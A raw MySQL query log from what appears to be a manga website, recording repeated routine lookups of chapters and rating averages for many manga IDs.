Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648235 Query select * FROM chapters where manga_id = '151' order by created desc limit 1 330648235 Quit 330648236 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648226 Quit 330648236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330648237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648236 Quit 330648237 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330648238 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648238 Query select * FROM chapters where manga_id = '146' order by created desc limit 1 330648238 Quit 330648239 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330648239 Quit 330648240 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648240 Query select * FROM chapters where manga_id = '138' order by created desc limit 1 330648240 Quit 330648241 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330648241 Quit 330648242 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648242 Query select * FROM chapters where manga_id = '135' order by created desc limit 1 330648242 Quit 330648243 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330648243 Quit 330648244 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648244 Query select * FROM chapters where manga_id = '131' order by created desc limit 1 330648244 Quit 330648245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330648245 Quit 330648246 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648246 Query select * FROM chapters where manga_id = '119' order by created desc limit 1 330648246 Quit 330648247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330648247 Quit 330648248 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648248 Query select * FROM chapters where manga_id = '116' order by created desc limit 1 330648248 Quit 330648249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330648249 Quit 330648250 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648250 Query select * FROM chapters where manga_id = '132' order by created desc limit 1 330648250 Quit 330648251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330648251 Quit 330648252 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648252 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330648252 Quit 330648253 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330648253 Quit 330648254 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648254 Query select * FROM chapters where manga_id = '26' order by created desc limit 1 330648254 Quit 330648255 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330648255 Quit 330648256 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648256 Query select * FROM chapters where manga_id = '193' order by created desc limit 1 330648256 Quit 330648257 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330648257 Quit 330648258 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648258 Query select * FROM chapters where manga_id = '284' order by created desc limit 1 330648258 Quit 330648259 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330648259 Quit 330648260 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648260 Query select * FROM chapters where manga_id = '236' order by created desc limit 1 330648260 Quit 330648261 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330648261 Quit 330648262 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648262 Query select * FROM chapters where manga_id = '256' order by created desc limit 1 330648262 Quit 330648263 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330648263 Quit 330648264 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648264 Query select * FROM chapters where manga_id = '25' order by created desc limit 1 330648265 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648264 Quit 330648265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330648265 Quit 330648266 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648266 Query select * FROM chapters where manga_id = '189' order by created desc limit 1 330648266 Quit 330648267 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330648267 Quit 330648268 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648268 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330648268 Quit 330648269 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330648269 Quit 330648270 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330648270 Quit 330648271 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330648271 Quit 330648272 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330648272 Quit 330648273 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330648273 Quit 330648274 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330648274 Quit 330648275 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330648275 Quit 330648276 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330648276 Quit 330648277 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330648277 Quit 330648278 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330648278 Quit 330648279 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330648279 Quit 330648280 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330648280 Quit 330648281 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330648281 Quit 330648282 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330648282 Quit 330648283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330648283 Quit 330648284 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330648284 Quit 330648285 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330648285 Quit 330648286 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330648286 Quit 330648287 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330648287 Quit 330648288 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330648288 Quit 330648289 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330648289 Quit 330648290 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330648290 Quit 330648291 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330648291 Quit 330648292 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330648292 Quit 330648293 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330648293 Quit 330648294 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330648294 Quit 330648295 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330648295 Quit 330648296 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330648296 Quit 330648297 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330648297 Quit 330648298 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330648298 Quit 330648299 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330648299 Quit 330648300 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330648300 Quit 330648301 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330648301 Quit 330648302 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330648302 Quit 330648303 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330648303 Quit 330648304 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330648304 Quit 330648305 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330648305 Quit 330648306 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330648306 Quit 330648307 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330648307 Quit 330648308 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330648308 Quit 330648309 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330648309 Quit 330648310 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330648310 Quit 330648311 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330648311 Quit 330648312 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330648312 Quit 330648313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330648313 Quit 330648314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330648314 Quit 330648315 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330648315 Quit 330648316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330648316 Quit 330648317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330648317 Quit 330648318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330648318 Quit 330648319 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330648319 Quit 330648320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330648320 Quit 330648321 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330648321 Quit 330648322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330648322 Quit 330648323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330648323 Quit 330648324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330648324 Quit 330648325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330648325 Quit 330648326 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330648326 Quit 330648327 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330648327 Quit 330648328 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330648328 Quit 330648329 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330648329 Quit 330648330 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330648330 Quit 330648331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330648331 Quit 330648332 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330648332 Quit 330648333 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330648333 Quit 330648334 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330648334 Quit 330648335 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330648335 Quit 330648336 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330648336 Quit 330648337 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330648337 Quit 330648338 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330648338 Quit 330648339 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330648339 Quit 330648340 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330648340 Quit 330648341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330648341 Quit 330648342 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330648342 Quit 330648343 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330648343 Quit 330648344 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330648344 Quit 330648345 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330648345 Quit 330648346 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330648346 Quit 330648347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330648347 Quit 330648348 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330648348 Quit 330648349 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330648349 Quit 330648350 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330648350 Quit 330648351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330648351 Quit 330648352 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330648352 Quit 330648353 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330648353 Quit 330648354 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330648354 Quit 330648355 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330648355 Quit 330648356 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330648356 Quit 330648357 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330648357 Quit 330648358 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330648358 Quit 330648359 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330648359 Quit 330648360 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330648360 Quit 330648361 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330648361 Quit 330648362 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330648362 Quit 330648363 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330648363 Quit 330648364 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330648364 Quit 330648365 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330648365 Quit 330648366 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330648366 Quit 330648367 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330648367 Quit 330648368 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330648368 Quit 330648369 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330648369 Quit 330648370 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330648370 Quit 330648371 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330648371 Quit 330648372 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330648372 Quit 330648373 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330648373 Quit 330648374 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330648374 Quit 330648375 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330648375 Quit 330648376 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330648376 Quit 330648377 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330648377 Quit 330648378 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330648378 Quit 330648379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330648379 Quit 330648380 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330648380 Quit 330648381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330648381 Quit 330648382 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330648382 Quit 330648383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330648383 Quit 330648384 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330648384 Quit 330648385 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330648385 Quit 330648386 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330648386 Quit 330648387 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330648387 Quit 330648388 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330648388 Quit 330648389 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330648389 Quit 330648390 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 